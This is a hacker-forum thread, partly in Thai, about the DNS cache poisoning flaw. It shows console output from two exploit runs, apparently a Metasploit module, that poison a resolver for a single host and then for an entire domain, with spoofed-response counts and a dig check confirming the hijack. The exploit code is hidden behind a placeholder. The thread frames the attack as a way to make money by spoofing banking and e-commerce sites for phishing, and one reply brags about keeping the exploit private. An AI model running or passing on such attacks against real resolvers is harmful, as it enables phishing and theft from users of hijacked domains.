และนั่นก็คือช่องโหว่ DNS Cache Poisoning อันน่ากลัวสุดๆ ที่เครื่องทุกเครื่องในโลกนี้ที่ใช้ DNS กำลังเป็นเหยื่ออยู่ในขณะนี้ ที่แย่ไปกว่านั้นคือยังไม่มี patch ออกมาด้วย เพราะเป็น weakness ของ DNS protocol เรื่องขนาด 16 bits ID, และ source port ที่ไม่ randomized พอ

attacker can make money จากการ spoof domain name เช่น ebanking, ecommerce web sites เพื่อทำ phishing

ลองเช็คว่า DNS server ที่คุณใช้อยู่ vulnerable หรือไม่:

**Hidden Content: Check the thread to see hidden data.**

Exploit version 1:
Hijack individual host in a domain:
Targeting nameserver A.B.C.D
Querying recon nameserver for example.com.'s nameservers...
Got answer with 2 answers, 0 authorities
Got an NS record: example.com. 172643 IN NS ns89.worldnic.com.
Querying recon nameserver for address of ns89.worldnic.com....
Got answer with 1 answers, 0 authorities
Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45
Checking Authoritativeness: Querying 205.178.190.45 for example.com....
ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as
Got an NS record: example.com. 172643 IN NS ns90.worldnic.com.
Querying recon nameserver for address of ns90.worldnic.com....
Got answer with 1 answers, 0 authorities
Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45
Checking Authoritativeness: Querying 205.178.144.45 for example.com....
ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as
Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178...
Sent 1000 queries and 20000 spoofed responses...
Sent 2000 queries and 40000 spoofed responses...
Sent 3000 queries and 60000 spoofed responses...
Sent 4000 queries and 80000 spoofed responses...
Sent 5000 queries and 100000 spoofed responses...
Sent 6000 queries and 120000 spoofed responses...
Sent 7000 queries and 140000 spoofed responses...
Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7

Exploit version 2:
Hijack entire domain using spoofed replies:
b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
Querying recon nameserver for address of a.iana-servers.net....
Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
Checking Authoritativeness: Querying 192.0.34.43 for example.com....
a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
Sent 1000 queries and 20000 spoofed responses...
Sent 2000 queries and 40000 spoofed responses...
Sent 3000 queries and 60000 spoofed responses...
Sent 4000 queries and 80000 spoofed responses...
Sent 5000 queries and 100000 spoofed responses...
Sent 6000 queries and 120000 spoofed responses...
Sent 7000 queries and 140000 spoofed responses...
Sent 8000 queries and 160000 spoofed responses...
Sent 9000 queries and 180000 spoofed responses...
Sent 10000 queries and 200000 spoofed responses...
Sent 11000 queries and 220000 spoofed responses...
Sent 12000 queries and 240000 spoofed responses...
Sent 13000 queries and 260000 spoofed responses...
Poisoning successful after 13250 attempts: example.com. == dns01.pwned.com
Auxiliary module execution completed

dig +short -t ns example.com @A.B.C.D

dns01.pwned.com

Exploit code:

**Hidden Content: Check the thread to see hidden data.**

i know this bug and how to exploit it..

Making a video tutorial about it ,will be awesome hahaha..

But i am afraid of skiddies who will played with it , it should be priv8 and stay priv8.

Most of the important companies like live.com,ebay has corrected the vuln. And a lot of bank are always vulnerable.

The resulting of the vuln that 's now we find more exploit on google than correction's paper of the exploit ..